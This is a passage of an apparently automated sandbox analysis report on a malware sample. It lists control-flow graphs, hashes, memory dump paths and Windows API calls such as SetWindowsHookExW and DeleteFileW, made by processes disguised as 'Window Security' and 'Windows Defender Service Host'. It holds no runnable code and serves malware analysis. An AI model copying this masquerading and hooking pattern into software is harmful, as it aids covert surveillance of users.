                                                    • Opcode ID: 1b69bb25f8c602e174444536b001eb9e1831f7f175d298825a526cc14ffb9c21
                                                    • Instruction ID: 5aefa55b55d31c0c58d22ef8a5f54d52008af3497d32e1f45b14e50d9b987df9
                                                    • Opcode Fuzzy Hash: 1b69bb25f8c602e174444536b001eb9e1831f7f175d298825a526cc14ffb9c21
                                                    • Instruction Fuzzy Hash: 2AC012328063A8CEE32163B8E15C2287A61FB62302F804295F003180EA8FB809868712

                                                    Non-executed Functions

                                                    Function 0152FA7C Relevance: 6.5, Strings: 5, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0o@p$Dq@p$Lj@p$Lj@p$PH]q
                                                    • API String ID: 0-2942548252
                                                    • Opcode ID: 6f03c088f7ad044038d10ba20d29548a870215e8259a4968acc413ea4e660c6a
                                                    • Instruction ID: 8a45cf0915902747f0dd169fdfc6378427933dd5371e14673b469c8a6e66923c
                                                    • Opcode Fuzzy Hash: 6f03c088f7ad044038d10ba20d29548a870215e8259a4968acc413ea4e660c6a
                                                    • Instruction Fuzzy Hash: 6C819B367101148FDB08DF38E5A8A6D77F2FF89210B2480AAD806DB3A5DB75DC46CB51

                                                    Execution Graph

                                                    Execution Coverage:9.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:30
                                                    Total number of Limit Nodes:2
                                                    execution_graph 12563 1590848 12564 1590852 12563->12564 12568 15921b3 12563->12568 12565 159089e 12564->12565 12573 159b0f0 12564->12573 12569 15921d5 12568->12569 12579 15922af 12569->12579 12583 15922c0 12569->12583 12576 159b11f 12573->12576 12574 159b19b 12574->12565 12575 159b243 12575->12565 12576->12574 12591 159fdd0 12576->12591 12595 159fdc2 12576->12595 12581 15922c0 12579->12581 12580 15923c4 12580->12580 12581->12580 12587 1591980 12581->12587 12584 15922e7 12583->12584 12585 1591980 CreateActCtxA 12584->12585 12586 15923c4 12584->12586 12585->12586 12588 1593350 CreateActCtxA 12587->12588 12590 1593413 12588->12590 12592 159fdde 12591->12592 12602 159f51c 12592->12602 12596 159fdcb 12595->12596 12597 159fe31 DeleteFileW 12595->12597 12599 159f51c DeleteFileW 12596->12599 12601 159fe77 12597->12601 12600 159fde5 12599->12600 12600->12575 12601->12575 12604 159fdf8 DeleteFileW 12602->12604 12605 159fde5 12604->12605 12605->12575

                                                    Executed Functions

                                                    Function 06B90048 Relevance: 26.7, Strings: 21, Instructions: 426COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 6b90048-6b90068 295 6b9006f-6b90071 294->295 296 6b90089-6b900bd 295->296 297 6b90073-6b90079 295->297 302 6b900c0-6b900c4 296->302 298 6b9007b 297->298 299 6b9007d-6b9007f 297->299 298->296 299->296 303 6b900cd-6b900d2 302->303 304 6b900c6-6b900cb 302->304 305 6b900d8-6b900db 303->305 304->305 306 6b900e1-6b900f5 305->306 307 6b90db7-6b90dc1 305->307 306->302 309 6b900f7 306->309 310 6b900fe-6b9010b 309->310 311 6b901de-6b901ed 309->311 312 6b902c0-6b902cf 309->312 313 6b903a2-6b903b1 309->313 314 6b90484-6b90493 309->314 315 6b90d3f-6b90d63 310->315 316 6b90111-6b90137 310->316 311->315 320 6b901f3-6b90219 311->320 312->315 319 6b902d5-6b902fb 312->319 313->315 318 6b903b7-6b903dd 313->318 314->315 317 6b90499-6b904bf 314->317 333 6b90d69-6b90d70 315->333 334 6b90f32-6b90f37 315->334 347 6b90139-6b9013e 316->347 348 6b90140-6b90147 316->348 350 6b904c8-6b904cf 317->350 351 6b904c1-6b904c6 317->351 341 6b903df-6b903e4 318->341 342 6b903e6-6b903ed 318->342 343 6b902fd-6b90302 319->343 344 6b90304-6b9030b 319->344 345 6b9021b-6b90220 320->345 346 6b90222-6b90229 320->346 333->334 336 6b90d76-6b90d91 333->336 336->334 368 6b90d97-6b90d9f 336->368 355 6b90452-6b9047f 341->355 362 6b903ef-6b90411 342->362 363 6b90413-6b90437 342->363 357 6b90370-6b9039d 343->357 364 6b9030d-6b9032f 344->364 365 6b90331-6b90355 344->365 358 6b9028e-6b902bb 345->358 366 6b9022b-6b9024d 346->366 367 6b9024f-6b90273 346->367 359 6b901ac-6b901d9 347->359 352 6b90149-6b9016b 348->352 353 6b9016d-6b90191 348->353 360 6b904d1-6b904f3 350->360 361 6b904f5-6b90519 350->361 354 6b90534-6b90561 351->354 352->359 408 6b901a9 353->408 409 6b90193-6b90199 353->409 354->302 355->302 357->302 358->302 359->302 360->354 400 6b9051b-6b90521 361->400 401 6b90531 361->401 362->355 402 6b90439-6b9043f 363->402 403 6b9044f 363->403 364->357 404 6b9036d 365->404 405 6b90357-6b9035d 365->405 366->358 406 6b9028b 367->406 407 6b90275-6b9027b 367->407 368->334 379 6b90da5-6b90dae 368->379 379->307 410 6b90523 400->410 411 6b90525-6b90527 400->411 401->354 412 6b90441 402->412 413 6b90443-6b90445 402->413 403->355 404->357 414 6b9035f 405->414 415 6b90361-6b90363 405->415 406->358 416 6b9027d 407->416 417 6b9027f-6b90281 407->417 408->359 418 6b9019b 409->418 419 6b9019d-6b9019f 409->419 410->401 411->401 412->403 413->403 414->404 415->404 416->406 417->406 418->408 419->408
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2864892595.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6b90000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ?$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-1152698448
                                                    • Opcode ID: 515996c8b3391ba4063579d9ae082662b396f8e0caecf0d3050756df760b5608
                                                    • Instruction ID: ffcf45a3dd3ab77db6ffa1f6a0981ed4c78e527b037e4a0b5d2e5423af1e1cb1
                                                    • Opcode Fuzzy Hash: 515996c8b3391ba4063579d9ae082662b396f8e0caecf0d3050756df760b5608
                                                    • Instruction Fuzzy Hash: 51F19F70B402098FDF58DFA9C954A6DBBB6FF89700F1484A9E4069B3A5CB35DC41CB61
                                                    Function 06B90001 Relevance: 7.8, Strings: 6, Instructions: 257COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 420 6b90001-6b90068 421 6b9006f-6b90071 420->421 422 6b90089-6b900bd 421->422 423 6b90073-6b90079 421->423 428 6b900c0-6b900c4 422->428 424 6b9007b 423->424 425 6b9007d-6b9007f 423->425 424->422 425->422 429 6b900cd-6b900d2 428->429 430 6b900c6-6b900cb 428->430 431 6b900d8-6b900db 429->431 430->431 432 6b900e1-6b900f5 431->432 433 6b90db7-6b90dc1 431->433 432->428 435 6b900f7 432->435 436 6b900fe-6b9010b 435->436 437 6b901de-6b901ed 435->437 438 6b902c0-6b902cf 435->438 439 6b903a2-6b903b1 435->439 440 6b90484-6b90493 435->440 441 6b90d3f-6b90d63 436->441 442 6b90111-6b90137 436->442 437->441 446 6b901f3-6b90219 437->446 438->441 445 6b902d5-6b902fb 438->445 439->441 444 6b903b7-6b903dd 439->444 440->441 443 6b90499-6b904bf 440->443 459 6b90d69-6b90d70 441->459 460 6b90f32-6b90f37 441->460 473 6b90139-6b9013e 442->473 474 6b90140-6b90147 442->474 476 6b904c8-6b904cf 443->476 477 6b904c1-6b904c6 443->477 467 6b903df-6b903e4 444->467 468 6b903e6-6b903ed 444->468 469 6b902fd-6b90302 445->469 470 6b90304-6b9030b 445->470 471 6b9021b-6b90220 446->471 472 6b90222-6b90229 446->472 459->460 462 6b90d76-6b90d91 459->462 462->460 494 6b90d97-6b90d9f 462->494 481 6b90452-6b9047f 467->481 488 6b903ef-6b90411 468->488 489 6b90413-6b90437 468->489 483 6b90370-6b9039d 469->483 490 6b9030d-6b9032f 470->490 491 6b90331-6b90355 470->491 484 6b9028e-6b902bb 471->484 492 6b9022b-6b9024d 472->492 493 6b9024f-6b90273 472->493 485 6b901ac-6b901d9 473->485 478 6b90149-6b9016b 474->478 479 6b9016d-6b90191 474->479 486 6b904d1-6b904f3 476->486 487 6b904f5-6b90519 476->487 480 6b90534-6b90561 477->480 478->485 534 6b901a9 479->534 535 6b90193-6b90199 479->535 480->428 481->428 483->428 484->428 485->428 486->480 526 6b9051b-6b90521 487->526 527 6b90531 487->527 488->481 528 6b90439-6b9043f 489->528 529 6b9044f 489->529 490->483 530 6b9036d 491->530 531 6b90357-6b9035d 491->531 492->484 532 6b9028b 493->532 533 6b90275-6b9027b 493->533 494->460 505 6b90da5-6b90dae 494->505 505->433 536 6b90523 526->536 537 6b90525-6b90527 526->537 527->480 538 6b90441 528->538 539 6b90443-6b90445 528->539 529->481 530->483 540 6b9035f 531->540 541 6b90361-6b90363 531->541 532->484 542 6b9027d 533->542 543 6b9027f-6b90281 533->543 534->485 544 6b9019b 535->544 545 6b9019d-6b9019f 535->545 536->527 537->527 538->529 539->529 540->530 541->530 542->532 543->532 544->534 545->534
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2864892595.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6b90000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ?$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-4101917017
                                                    • Opcode ID: 5109c81b5eedc86e741bbfc0b3db4c440f6e014c81300ed5c20c426b5b244d41
                                                    • Instruction ID: b24dfe2d3b7c1b45a9e6201ab301f5a22a941f115c34e006bbbee6ec75ff0b12
                                                    • Opcode Fuzzy Hash: 5109c81b5eedc86e741bbfc0b3db4c440f6e014c81300ed5c20c426b5b244d41
                                                    • Instruction Fuzzy Hash: A49104B0B442058FEB059B69CC50B7E7BB6EF89304F1485AAD501DB3A2DB759C05C7A1
                                                    Function 01591980 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1110 1591980-1593411 CreateActCtxA 1113 159341a-1593474 1110->1113 1114 1593413-1593419 1110->1114 1121 1593483-1593487 1113->1121 1122 1593476-1593479 1113->1122 1114->1113 1123 1593489-1593495 1121->1123 1124 1593498 1121->1124 1122->1121 1123->1124 1126 1593499 1124->1126 1126->1126
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 01593401
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 25b38d30bf630f223bd6ca359df8be955cacde264726a161539c19acb341d1ee
                                                    • Instruction ID: 8d9fe3c5b3f5d6d7f64275b1b6f1a864581cc3a49512987bd16511b12f8dd081
                                                    • Opcode Fuzzy Hash: 25b38d30bf630f223bd6ca359df8be955cacde264726a161539c19acb341d1ee
                                                    • Instruction Fuzzy Hash: 09411EB0C00619CBDF24DFA9C848B9EBBF1BF49304F20846AD508AB255DB756946CF92
                                                    Function 01593347 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1127 1593347-1593411 CreateActCtxA 1129 159341a-1593474 1127->1129 1130 1593413-1593419 1127->1130 1137 1593483-1593487 1129->1137 1138 1593476-1593479 1129->1138 1130->1129 1139 1593489-1593495 1137->1139 1140 1593498 1137->1140 1138->1137 1139->1140 1142 1593499 1140->1142 1142->1142
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 01593401
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 6837132a223e094059817b7fbb5b6c1a6aecdb22351f23994a5b1fd390ecdd52
                                                    • Instruction ID: 289597846cf35e6e5cfcf6a94b652b43de343cf206605951ab503a9a1a6f9533
                                                    • Opcode Fuzzy Hash: 6837132a223e094059817b7fbb5b6c1a6aecdb22351f23994a5b1fd390ecdd52
                                                    • Instruction Fuzzy Hash: C7411EB4C00319CFDB25DFA9C948B8DBBF1BF48304F20846AD408AB255DB756946CF91
                                                    Function 0159F51C Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1143 159f51c-159fe42 1147 159fe4a-159fe75 DeleteFileW 1143->1147 1148 159fe44-159fe47 1143->1148 1149 159fe7e-159fea6 1147->1149 1150 159fe77-159fe7d 1147->1150 1148->1147 1150->1149
                                                    APIs
                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0159FDE5), ref: 0159FE68
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 0f62f078fdbf86220ea2b30131eace09b36a576b408016a99e83e4a703192c45
                                                    • Instruction ID: 74f72096902ad34c140efc636170ff775b9ed8e5a55016fe52fdd2896c256bcf
                                                    • Opcode Fuzzy Hash: 0f62f078fdbf86220ea2b30131eace09b36a576b408016a99e83e4a703192c45
                                                    • Instruction Fuzzy Hash: 7D2113B1C0065A9BCB14DF9AC544AAEFBF4FF48720F14856AD918A7241D778A940CFE1
                                                    Function 0159FDF0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1153 159fdf0-159fe42 1156 159fe4a-159fe75 DeleteFileW 1153->1156 1157 159fe44-159fe47 1153->1157 1158 159fe7e-159fea6 1156->1158 1159 159fe77-159fe7d 1156->1159 1157->1156 1159->1158
                                                    APIs
                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0159FDE5), ref: 0159FE68
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 97edf9fdb53f303ba2aa5ce5ac6d80a6b9ee2a2d34a6a11b5488ee784ade7687
                                                    • Instruction ID: 2469e4d327de448b112b2bd43a1274ca02387a733d04db3a3829a4cff37387b1
                                                    • Opcode Fuzzy Hash: 97edf9fdb53f303ba2aa5ce5ac6d80a6b9ee2a2d34a6a11b5488ee784ade7687
                                                    • Instruction Fuzzy Hash: 922132B1C0065A9BDB14CFAAC5447AEBFF0BB48720F14812AD918A7241D338A940CFA1
                                                    Function 0159FDC2 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1162 159fdc2-159fdc8 1163 159fdcb-159fde0 call 159f51c 1162->1163 1164 159fe31-159fe42 1162->1164 1173 159fde5-159fde6 1163->1173 1167 159fe4a-159fe75 DeleteFileW 1164->1167 1168 159fe44-159fe47 1164->1168 1170 159fe7e-159fea6 1167->1170 1171 159fe77-159fe7d 1167->1171 1168->1167 1171->1170
                                                    APIs
                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0159FDE5), ref: 0159FE68
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: aa06fb4d0804f6ddd95c8bc07c55f78e4d2380011686589499ddc5797da3b63c
                                                    • Instruction ID: 81f4a3b88ad230842517110f87adb6b0f8f51d30f892f9a15fbfe6f286a3bed2
                                                    • Opcode Fuzzy Hash: aa06fb4d0804f6ddd95c8bc07c55f78e4d2380011686589499ddc5797da3b63c
                                                    • Instruction Fuzzy Hash: 7E117CB2D0061A8FDF14DFA9D5047AEBBE0FF48720F05815AD508EB252D738A945CFA2
                                                    Function 0152D4D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2838322358.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_152d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69456d2ef3d792e6d0c13781465f2c3813aa3d402bac5964b024544d4787f167
                                                    • Instruction ID: 730ba1e7c27b9d455b5ea3010bc04fcd035ab21e795c7bc646932311100b4deb
                                                    • Opcode Fuzzy Hash: 69456d2ef3d792e6d0c13781465f2c3813aa3d402bac5964b024544d4787f167
                                                    • Instruction Fuzzy Hash: C3212872604204DFDB05DF98D9C0F1ABFB5FB89318F208569E9090F296C37AD456CBA2
                                                    Function 0152D3EC Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2838322358.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_152d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8198bd90dab3fec3a5806fa6add5e46091df755a788154c1cd58f0ca7562db41
                                                    • Instruction ID: d161e903443e5220d1b9907f9a2bdbacd7fc332346aedde477901af2d6e7b9c8
                                                    • Opcode Fuzzy Hash: 8198bd90dab3fec3a5806fa6add5e46091df755a788154c1cd58f0ca7562db41
                                                    • Instruction Fuzzy Hash: 9E210372504204DFDB05DF98D9C0B6ABFB5FB99320F20C569E9090F296C37AE456C6E1
                                                    Function 0152D4D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2838322358.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_152d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: e682f94c113d467bd01d6220bc90cd0071f131d76198334feacb701b258ffc6e
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 2D11AF76504280CFDB16CF54D5C4B1ABF71FB89314F2486A9D9094F256C33AD45ACBA2
                                                    Function 0152D3E7 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2838322358.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_152d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 96b0b3c90c534dd87af205c166f08541339cd09782d6d53c7ec5e03da942718e
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: D911DF72404240CFCB02CF44D5C4B5ABF72FB84320F24C6A9D9090B696C33AE45ACBA2

                                                    Execution Graph

                                                    Execution Coverage:20.9%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:3
                                                    Total number of Limit Nodes:0
                                                    execution_graph 4635 7ff848f12918 4636 7ff848f12921 SetWindowsHookExW 4635->4636 4638 7ff848f129f1 4636->4638

                                                    Executed Functions

                                                    Function 00007FF848F12918 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 201 7ff848f12918-7ff848f1291f 202 7ff848f1292a-7ff848f1299d 201->202 203 7ff848f12921-7ff848f12929 201->203 207 7ff848f12a29-7ff848f12a2d 202->207 208 7ff848f129a3-7ff848f129a8 202->208 203->202 209 7ff848f129b2-7ff848f129ef SetWindowsHookExW 207->209 210 7ff848f129af-7ff848f129b0 208->210 211 7ff848f129f1 209->211 212 7ff848f129f7-7ff848f12a28 209->212 210->209 211->212
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4552904367.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: ddf3da39afa85b8019bc3ea54e4233012e8432fd8e5c6e2deab10f86b5300fc7
                                                    • Instruction ID: 9cc08d37395eb9d2044c8b30ebf5738ce4faef2551467ba03ea57b5169abeb51
                                                    • Opcode Fuzzy Hash: ddf3da39afa85b8019bc3ea54e4233012e8432fd8e5c6e2deab10f86b5300fc7
                                                    • Instruction Fuzzy Hash: D141083191CA5D4FDB58EBAC98466F9BBE1EB59321F00027ED049D3292CF74A8528BC5

                                                    Execution Graph

                                                    Execution Coverage:6.5%
                                                    Dynamic/Decrypted Code Coverage:97.9%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:97
                                                    Total number of Limit Nodes:6
                                                    execution_graph 33703 a3d233 33704 a3d262 33703->33704 33709 503a8f4 33703->33709 33713 503c988 33703->33713 33717 503c978 33703->33717 33721 503d6d8 33703->33721 33710 503a8ff 33709->33710 33712 503d739 33710->33712 33725 503aa1c CallWindowProcW 33710->33725 33714 503c9ae 33713->33714 33715 503a8f4 CallWindowProcW 33714->33715 33716 503c9cf 33715->33716 33716->33704 33718 503c9ae 33717->33718 33719 503a8f4 CallWindowProcW 33718->33719 33720 503c9cf 33719->33720 33720->33704 33723 503d715 33721->33723 33724 503d739 33723->33724 33726 503aa1c CallWindowProcW 33723->33726 33725->33712 33726->33724 33727 503c7d0 33728 503c838 CreateWindowExW 33727->33728 33730 503c8f4 33728->33730 33730->33730 33777 503ed60 33778 503edd2 33777->33778 33779 503ee7c 33777->33779 33780 503ee2a CallWindowProcW 33778->33780 33782 503edd9 33778->33782 33781 503a8f4 CallWindowProcW 33779->33781 33780->33782 33781->33782 33731 49c0848 33732 49c0852 33731->33732 33736 49c21b3 33731->33736 33733 49c089e 33732->33733 33741 49cb0d3 33732->33741 33737 49c21d5 33736->33737 33749 49c22af 33737->33749 33754 49c22c0 33737->33754 33743 49cb11f 33741->33743 33742 49cb19b 33742->33733 33743->33742 33762 49cfdd0 33743->33762 33766 49cfd63 33743->33766 33744 49cb243 33745 49cb271 33744->33745 33770 49cfeb0 33744->33770 33745->33733 33750 49c21df 33749->33750 33752 49c22bf 33749->33752 33750->33732 33751 49c23c4 33751->33751 33752->33751 33758 49c1980 33752->33758 33755 49c22e7 33754->33755 33756 49c1980 CreateActCtxA 33755->33756 33757 49c23c4 33755->33757 33756->33757 33759 49c3350 CreateActCtxA 33758->33759 33761 49c3413 33759->33761 33761->33751 33763 49cfdde 33762->33763 33773 49cf51c 33763->33773 33767 49cfd7a 33766->33767 33768 49cf51c DeleteFileW 33767->33768 33769 49cfde5 33768->33769 33769->33744 33771 49cfe64 DeleteFileW 33770->33771 33772 49cfe77 33770->33772 33771->33772 33772->33745 33774 49cfdf8 DeleteFileW 33773->33774 33776 49cfde5 33774->33776 33776->33744 33783 503cf68 33784 503cf7c 33783->33784 33786 503cf98 33784->33786 33787 5032e18 33784->33787 33788 5032e28 33787->33788 33789 5032e45 33788->33789 33791 5032114 GetCurrentProcess GetCurrentThread GetCurrentProcess GetCurrentThreadId 33788->33791 33789->33786 33791->33789 33665 5039f4c 33666 5039f5d 33665->33666 33667 5039f65 33665->33667 33672 503a176 33667->33672 33677 503a198 33667->33677 33680 503a188 33667->33680 33668 5039f9c 33673 503a183 33672->33673 33674 503a17b 33672->33674 33683 503a1d8 33673->33683 33674->33668 33675 503a1a2 33675->33668 33678 503a1a2 33677->33678 33679 503a1d8 2 API calls 33677->33679 33678->33668 33679->33678 33681 503a1a2 33680->33681 33682 503a1d8 2 API calls 33680->33682 33681->33668 33682->33681 33684 503a1f9 33683->33684 33685 503a21c 33683->33685 33684->33685 33691 503a470 33684->33691 33695 503a480 33684->33695 33685->33675 33686 503a420 GetModuleHandleW 33688 503a44d 33686->33688 33687 503a214 33687->33685 33687->33686 33688->33675 33692 503a475 33691->33692 33694 503a4b9 33692->33694 33699 50391c8 33692->33699 33694->33687 33696 503a494 33695->33696 33697 50391c8 LoadLibraryExW 33696->33697 33698 503a4b9 33696->33698 33697->33698 33698->33687 33700 503a640 LoadLibraryExW 33699->33700 33702 503a6b9 33700->33702 33702->33694

                                                    Executed Functions

                                                    Function 06070048 Relevance: 26.7, Strings: 21, Instructions: 426COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 6070048-6070068 295 607006f-6070071 294->295 296 6070073-6070079 295->296 297 6070089-60700bd 295->297 298 607007d-607007f 296->298 299 607007b 296->299 302 60700c0-60700c4 297->302 298->297 299->297 303 60700c6-60700cb 302->303 304 60700cd-60700d2 302->304 305 60700d8-60700db 303->305 304->305 306 6070db7-6070dc1 305->306 307 60700e1-60700f5 305->307 307->302 309 60700f7 307->309 310 6070484-6070493 309->310 311 60703a2-60703b1 309->311 312 60702c0-60702cf 309->312 313 60700fe-607010b 309->313 314 60701de-60701ed 309->314 315 6070d3f-6070d63 310->315 316 6070499-60704bf 310->316 311->315 317 60703b7-60703dd 311->317 312->315 318 60702d5-60702fb 312->318 313->315 320 6070111-6070137 313->320 314->315 319 60701f3-6070219 314->319 333 6070f32-6070f37 315->333 334 6070d69-6070d70 315->334 350 60704c1-60704c6 316->350 351 60704c8-60704cf 316->351 341 60703e6-60703ed 317->341 342 60703df-60703e4 317->342 344 6070304-607030b 318->344 345 60702fd-6070302 318->345 346 6070222-6070229 319->346 347 607021b-6070220 319->347 348 6070140-6070147 320->348 349 6070139-607013e 320->349 334->333 338 6070d76-6070d91 334->338 338->333 368 6070d97-6070d9f 338->368 352 6070413-6070437 341->352 353 60703ef-6070411 341->353 354 6070452-607047f 342->354 355 6070331-6070355 344->355 356 607030d-607032f 344->356 357 6070370-607039d 345->357 358 607024f-6070273 346->358 359 607022b-607024d 346->359 360 607028e-60702bb 347->360 361 607016d-6070191 348->361 362 6070149-607016b 348->362 363 60701ac-60701d9 349->363 367 6070534-6070561 350->367 365 60704f5-6070519 351->365 366 60704d1-60704f3 351->366 402 607044f 352->402 403 6070439-607043f 352->403 353->354 354->302 404 6070357-607035d 355->404 405 607036d 355->405 356->357 357->302 406 6070275-607027b 358->406 407 607028b 358->407 359->360 360->302 408 6070193-6070199 361->408 409 60701a9 361->409 362->363 363->302 400 6070531 365->400 401 607051b-6070521 365->401 366->367 367->302 368->333 384 6070da5-6070dae 368->384 384->306 400->367 410 6070525-6070527 401->410 411 6070523 401->411 402->354 412 6070443-6070445 403->412 413 6070441 403->413 414 6070361-6070363 404->414 415 607035f 404->415 405->357 416 607027f-6070281 406->416 417 607027d 406->417 407->360 418 607019d-607019f 408->418 419 607019b 408->419 409->363 410->400 411->400 412->402 413->402 414->405 415->405 416->407 417->407 418->409 419->409
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4537701929.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                    Joe Sandbox IDA Plugin
